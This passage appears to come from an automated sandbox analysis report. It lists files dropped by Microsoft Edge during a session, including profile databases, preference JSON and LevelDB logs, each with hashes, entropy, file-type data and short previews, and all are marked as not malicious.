                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7836182415564406
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                                                                                                                                  MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                                                                                                                                  SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                                                                                                                                  SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                                                                                                                                  SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                  MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                  SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                  SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                                  SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a4220d2e-585a-4e67-b591-72e933002222.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):39660
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.562237912872127
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:myrZcH7pLGLPeEWPCkf7R8F1+UoAYDCx9Tuqh0VfUC9xbog/OVatiBfWLrwPYkpq:myrZcBcPeEWPCkf7Ru1jaLti5WAAknBm
                                                                                                                                                                                                                                                                                  MD5:E815B6827FA83C7F297A5ABA6B48E9CC
                                                                                                                                                                                                                                                                                  SHA1:DE475E1121A45E50380B0D4CA8A2B40C7EBFE0FB
                                                                                                                                                                                                                                                                                  SHA-256:6415B3C0A4C15A9BFAB6B7FE6E76A71656F7A33BADFD4B42494AFB29070E42F5
                                                                                                                                                                                                                                                                                  SHA-512:8BFE1FAF6B6B11D76CE09D6BC62625DC3B00366354393CBEE18B1637B40E174D703922F5B033B9F4FA4EE6D5485315BEF05C40473274670AF1510D38DAF0818E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bc1118c0-9189-4df7-9ff0-9e10665d767f.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13066
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.153610680130476
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzG6IbY/3M8tpj+FVA1OHJj1f:sVeLAoxuJJzGgpUVGOHj
                                                                                                                                                                                                                                                                                  MD5:DECA78AB686BEE2191FF2066A10DCE00
                                                                                                                                                                                                                                                                                  SHA1:4CCBDE2C35E73A31253D070817D128B3FE7E904B
                                                                                                                                                                                                                                                                                  SHA-256:4A9431EDDA8435304A86617882C9DBC26DAAADEF39A1F0098044B6C7C2C82F3A
                                                                                                                                                                                                                                                                                  SHA-512:ACFB3ADA68075D64FAFFED385D999D6187172A4F10A764377370CA2DF03EC79AB788F84CA5FB45B9A60C395469E430D225D0DACCE65389854B9A833AEBBD5D93
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d5fdec14-bb2e-49c1-828f-5f7631d9cc32.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):37817
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5558544420466465
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:myrZcH7pLGLPeEWPCkf7R8F1+UoAYDCx9Tuqh0VfUC9xbog/OV6BfWLrwPYkyDdY:myrZcBcPeEWPCkf7Ru1ja/5WAAkwBtM
                                                                                                                                                                                                                                                                                  MD5:9D5CCB1D4F8B8BC15AB72CDC8429EB43
                                                                                                                                                                                                                                                                                  SHA1:128E71046CF96C375CE19FF463A260BA211023E3
                                                                                                                                                                                                                                                                                  SHA-256:CC6EA5FA7D45AD4AD146FAA3709F4AB64F0B60952717F19F88C72A0883F478B7
                                                                                                                                                                                                                                                                                  SHA-512:7119C5089BA8645F10CE3D838C7C03308D0D3B878410CB8DBCDC75517CA12E6C3267237E3CAF07F516B62FE5758A2A0E0740DE799F452EECAB22CAE77CD52E17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f5effc50-90b0-4b82-9aaa-e2e4aaf3d933.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.35226517389931394
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                                                                                                                                  MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                                                                                                                                  SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                                                                                                                                  SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                                                                                                                                  SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04597698982212379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:GYl/gtqyHQWAl/gtqyHQ1Z9XHl/Vl/UwL:nt8gt8ejFnf
                                                                                                                                                                                                                                                                                  MD5:E514D6F4A8EDEFFB22F9F4FDCC5CA2E8
                                                                                                                                                                                                                                                                                  SHA1:55C2E8AF468C8FB82A3C45E0B48C868D771E3B22
                                                                                                                                                                                                                                                                                  SHA-256:7C84EF56F1267813E77AF78B81C719B6EDC3D6A872089D31F5EC4DF510A88CC6
                                                                                                                                                                                                                                                                                  SHA-512:C672FB19DA4C099F0B5C46F5881D51D2DB6608BDB5ED908DE4A577F10CC466985169386D66430C10889820399958B2307BBD0A65A5C3EBB7A7E04DA0AA7DCFA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..-......................NG6.B.eZ..$A....~k.pbu..-......................NG6.B.eZ..$A....~k.pbu........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):49472
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3021032768159063
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:K9maRpLGYGCcDCjTyYGhXVSFGbMX3GYGCcoMXXCFFGwlAYGBhSFGI5kSFGL3Sx5b:I9RpphcWvRH3XNhKXSX17qGF5tiE
                                                                                                                                                                                                                                                                                  MD5:B98D579778076CBF6C8E59253C24AD7A
                                                                                                                                                                                                                                                                                  SHA1:37E363B88DF65A0B039FF99F4F68435EA4076846
                                                                                                                                                                                                                                                                                  SHA-256:7413A091E1C416B1E04CCD0AED4EB90372821E757D924A4084B233DF724B83A4
                                                                                                                                                                                                                                                                                  SHA-512:E9100E64AC28A47AD50C9FAAF732AD46D3AD90D516CFC833E1951D8C6D79383FC6927AFAD1968E8E2F5B0BF39E3BFD9AA3B7D599D2E61A40D48FF9485CF95A41
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:7....-..........eZ..$A..|]x\.vA........eZ..$A..GK.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3976
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.079317047071047
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:Ck386G8as386G8IHRxA386G8eaIA386G8eaG:KDP3r73
                                                                                                                                                                                                                                                                                  MD5:9526D186F1C2332D6705319B14E3FA00
                                                                                                                                                                                                                                                                                  SHA1:24071ACAA9D6D18A1258F4343DC81D082D1ADD71
                                                                                                                                                                                                                                                                                  SHA-256:40ECDBC2720DF1C382A7E8ED448907C6CB44C0F89AF256A3437A8C8555624038
                                                                                                                                                                                                                                                                                  SHA-512:2328D334ADC6A167553FA92F31E4FEAA064DD78D156E0840F5D7E2CC808FC7ED7FC1D2A2AB75C0DDF3FC24ED45BD1763152BE7DCAB145CD5952C347D48F9CCF4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...................021_download,44bf1c60-8c51-4680-a9a2-88f950ec14cf......$44bf1c60-8c51-4680-a9a2-88f950ec14cf................."...nhttps://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1...https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1#.."nhttps://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1*.0.B.1733684767914485dJ.P...Z.application/binaryb.application/binaryj.........r.........x....................................................................................... ..,U.................20_1_1...1f.7..................20_1_1...1.n..;...............#38_h.......6.Z..W.F.....i.T.....i.T.............D0................39_config..........6.....n ...12B.l...............2B.l...............B..\

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.171939370546379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73RhUyB1wkn23oH+Tcwtfrl2KLlp3uq2Pwkn23oH+TcwtfrK+IFUv:730FfYeb1LT3uvYfYeb23FUv
                                                                                                                                                                                                                                                                                  MD5:FAF8F402AA0182D0557A8D9B7F7434DD
                                                                                                                                                                                                                                                                                  SHA1:AFBEBA26B972812EB95E1FD345A0B619338B5A4C
                                                                                                                                                                                                                                                                                  SHA-256:43C8CE388F72DD2A41FFA6E7CE91C7DD2E9B090121DFB36935ED9A8C05BCCDA8
                                                                                                                                                                                                                                                                                  SHA-512:1EB28AEF31B052E962A26E70086A5D7C01377F77931D4047235DCF1091056CA3E74949C53B3B35DCBA51F3E230C580F52F1F2A50F1AB6BAE639AC62A763B6FF9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.462 1eb0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2024/12/10-12:41:29.509 1eb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
